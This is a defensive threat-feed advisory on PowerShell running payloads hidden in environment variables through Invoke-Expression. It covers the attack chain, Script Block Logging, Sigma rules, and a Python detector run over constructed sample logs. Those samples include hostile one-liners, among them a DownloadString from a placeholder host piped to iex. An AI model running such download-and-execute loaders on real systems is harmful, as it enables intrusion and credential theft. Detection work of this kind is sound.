Threat Feed
high advisory

PowerShell Execution via Environment Variables

Adversaries use PowerShell to execute malicious code stored in environment variables, reading the variable back and handing its contents to Invoke-Expression (or its alias iex) so that the payload never appears in the script file or command line and is only assembled at runtime. The technique has been seen in malware loaders and stagers, including those associated with the VIP Keylogger.

Attackers are increasingly using PowerShell to execute malicious code held in environment variables. The command or encoded payload is stored in a variable, and a short script reads it back with $env: (or an equivalent such as [Environment]::GetEnvironmentVariable) and passes it to Invoke-Expression, or its alias iex, which compiles and runs the string at runtime. The script file or command line that lands on disk therefore contains only a variable reference, which defeats static analysis of the file and hides the true intent of the code. The technique has been observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign. The detection below targets PowerShell script blocks that combine environment variable access ($env:) with Invoke-Expression or its alias, using PowerShell Script Block Logging (Event ID 4104). Script Block Logging records each block as the engine runs it, including the new block PowerShell creates when Invoke-Expression executes the string pulled from the variable, so the expanded payload is logged even though it never touched disk.

Attack Chain

  1. The attacker gains initial access, typically through phishing or exploitation of a software vulnerability.
  2. PowerShell is started, directly or indirectly, by a script, a dropper or another process.
  3. The attacker places the malicious command or encoded payload in an environment variable, for example with [Environment]::SetEnvironmentVariable or an assignment to $env:NAME, or by setting it in the dropper's own environment so that the child PowerShell process inherits it.
  4. A short PowerShell script reads the variable back with $env: (or an equivalent such as [Environment]::GetEnvironmentVariable or the env: drive).
  5. The value is passed to Invoke-Expression or its alias iex.
  6. Invoke-Expression compiles and runs the string as code. Because the script on disk holds only the variable reference, static scanning of the file or the command line sees nothing malicious.
  7. The executed code downloads and runs a secondary payload, such as a keylogger or a remote access tool.
  8. The attacker achieves the objective, such as credential theft or persistent access.

Impact

Successful execution gives the attacker arbitrary code execution on the compromised system, which can be used to install malware, steal sensitive data or establish a persistent foothold. The VIP Keylogger campaign, for example, shows the technique being used to harvest user credentials. Because the payload lives in an environment variable rather than in the script file or command line, file-based and command-line detections miss it; without Script Block Logging the activity can go unnoticed, extending the attacker's dwell time. Compromised systems can then serve as a launchpad for attacks against other hosts in the network.

Recommendation

  • Enable PowerShell Script Block Logging (Event ID 4104) on all Windows systems. It records each script block as the engine executes it, including blocks created dynamically by Invoke-Expression, so the expanded payload is captured even though the script file only references a variable. Forward the events to a central collector, since a local log can be cleared by the attacker.
  • Deploy the provided Sigma rules to your SIEM to detect PowerShell script blocks that access environment variables and use Invoke-Expression or its alias. Tune them to your environment, for example by allow-listing known build or deployment scripts that legitimately combine the two, to reduce false positives.
  • Investigate any alert from these rules: pull the surrounding 4104 events from the same process to recover the code that Invoke-Expression actually ran, and check the parent process and command line in process creation telemetry.
  • Monitor PowerShell execution for suspicious environment variable access and dynamic code execution beyond these rules, including the [Environment]::GetEnvironmentVariable and Get-ChildItem env: forms that a rule keyed on $env: alone would miss.
  • Implement application control (AppLocker or Windows Defender Application Control) to prevent the execution of unauthorized PowerShell scripts.
  • Review PowerShell execution policies, but treat them as a safety feature rather than a security boundary: they are bypassed with a single command-line switch, so application control and logging must carry the actual enforcement.

Detection coverage (2 rules)

PowerShell Invoke-Expression with Environment Variable

high

Detects PowerShell command lines (process creation events) that use Invoke-Expression or its alias iex together with an environment variable reference, indicating potential dynamic code execution. Because the payload itself sits in the variable, the command line shows only the reference; this rule catches the one-liner launcher, not the expanded code.

Sigma rule. Tactic: execution. Technique: T1059.001. Log source: windows / process_creation.

PowerShell ScriptBlock Logging - Environment Variable and Invoke-Expression

high

Detects PowerShell Script Block Logging events (Event ID 4104) in which environment variable access is combined with Invoke-Expression, a pattern used to keep malicious code out of the script file. This is the primary rule for the technique, since 4104 sees the script block even when the launcher command line is clean.

Sigma rule. Tactic: execution. Technique: T1059.001. Log source: windows / powershell_script (Event ID 4104).
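The following Python check is an added example for this page; it is not the platform's Sigma rule and not code from the VIP Keylogger reporting. It implements the logic the two rules above describe (environment variable access combined with Invoke-Expression or iex in one script block) over constructed sample 4104 records that mirror the attack chain, and shows the tuning step from the recommendations. The variable names, paths, URL and allow-list entry are invented for the example.

```python
import re

# Constructed sample Event ID 4104 records, trimmed to the fields the check
# reads. They are not real telemetry; variable names, paths and the URL are
# invented. Records 1 and 2 are what Script Block Logging emits for the attack
# chain above: first the wrapper that reads the variable, then the separate
# block PowerShell creates when Invoke-Expression runs the variable's contents.
SAMPLE_4104 = [
    {"RecordId": 1, "Path": "", "ScriptBlockText": "iex $env:UPDATE_DATA"},
    {"RecordId": 2, "Path": "", "ScriptBlockText":
        "$w=New-Object Net.WebClient;$w.DownloadString('http://example.invalid/s')|iex"},
    {"RecordId": 3, "Path": r"C:\Users\Public\run.ps1", "ScriptBlockText":
        "Invoke-Expression ([Environment]::GetEnvironmentVariable('STAGE','Process'))"},
    {"RecordId": 4, "Path": "", "ScriptBlockText": "Write-Host $env:COMPUTERNAME"},
    {"RecordId": 5, "Path": "", "ScriptBlockText": r"iex (Get-Content .\build.ps1 -Raw)"},
    {"RecordId": 6, "Path": r"C:\Users\Public\x.ps1", "ScriptBlockText":
        "$p = (Get-ChildItem env:PAYLOAD).Value\nInvoke-Expression $p"},
    {"RecordId": 7, "Path": r"C:\CI\agent\build.ps1", "ScriptBlockText":
        "if ($env:CI) { Invoke-Expression 'dotnet build' }"},
]

# Invoke-Expression or its only built-in alias, matched as a whole token so
# "iex" inside a longer identifier does not fire.
INVOKE_RE = re.compile(r"(?<![\w-])(?:Invoke-Expression|iex)(?![\w-])", re.IGNORECASE)

# The ways a script block can read an environment variable:
#   $env:NAME / ${env:NAME}, the .NET accessor, and the env: PSDrive provider.
ENV_RE = re.compile(
    r"\$\{?env:"
    r"|\[(?:System\.)?Environment\]\s*::\s*GetEnvironmentVariable"
    r"|(?<![\w-])(?:Get-ChildItem|gci|ls|dir|Get-Item|gi)\s+env:",
    re.IGNORECASE,
)

# Tuning: script paths known to combine the two legitimately (build agents,
# deployment tooling). Constructed for the example; fill from your inventory.
ALLOWED_PATHS = {r"c:\ci\agent\build.ps1"}


def classify(event):
    """Return a hit dict for a 4104 record that matches the rule, else None."""
    text = event["ScriptBlockText"]
    invoke = INVOKE_RE.search(text)
    env = ENV_RE.search(text)
    if not (invoke and env):
        return None
    if event.get("Path", "").lower() in ALLOWED_PATHS:
        return None  # tuned out: known-good script on the allow-list
    return {
        "RecordId": event["RecordId"],
        "invoke": invoke.group(0),
        "env_access": env.group(0),
        "Path": event.get("Path", ""),
    }


def detect(events):
    """Apply the rule to a batch of 4104 records, preserving order."""
    hits = []
    for event in events:
        hit = classify(event)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_4104):
        print(hit)
```

Records 1, 3 and 6 are reported; record 7 matches the pattern but is suppressed by the allow-list, and records 4 and 5 show that either half alone is not enough. Note that the hit on record 1 contains no payload: what Invoke-Expression actually ran is record 2, which Script Block Logging writes as its own 4104 event with no $env: reference in it, so triage should pull the neighbouring 4104 events from the same process rather than stop at the wrapper. Token matching also misses command names built at runtime, such as & ('i'+'ex'), so treat the rule as high-signal rather than complete.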

Detection queries are kept inside the platform.